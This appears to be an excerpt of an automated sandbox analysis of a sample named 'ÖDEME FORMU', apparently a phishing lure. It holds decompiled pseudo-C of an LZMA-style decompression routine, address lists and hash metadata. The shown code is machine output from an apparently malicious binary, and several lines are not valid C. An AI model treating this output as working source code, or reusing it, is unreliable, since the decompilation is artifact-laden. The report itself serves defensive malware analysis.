										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004063cf
0x004063cf
0x004063d3
0x0040648a
0x0040648d
0x00406499
0x0040637a
0x0040637a
0x0040637d
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00000000
0x00406740
0x00406740
0x00406744
0x004068f3
0x00000000
0x004068f3
0x00406750
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406762
0x004063d9
0x004063dd
0x0040691e
0x0040691e
0x00406921
0x00406925
0x00406925
0x004063e3
0x004063e9
0x004063ec
0x004063f0
0x004063f3
0x004063f7
0x004068bd
0x00406909
0x00406911
0x00406918
0x0040691a
0x00000000
0x0040691a
0x004063fd
0x00406400
0x00406406
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00406431
0x00406431
0x00406431
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x00000000
0x00406110
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x00000000
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x00000000
0x0040645b
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x00000000
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x00000000
0x004066ec
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x00000000
0x0040685f
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00000000
0x004066b4
0x004066b2
0x004068e7
0x00000000
0x00000000
0x00405f16

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
Instruction ID: fc637cc57031d6fa7fc43ec0fa9912bbb078f827e800a3857ce4fc75fdb5e0f4
Opcode Fuzzy Hash: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
Instruction Fuzzy Hash: 00815771D00229CFDF24CFA8C844BADBBB1FB44305F25816AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED4 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405ED4(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406926))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
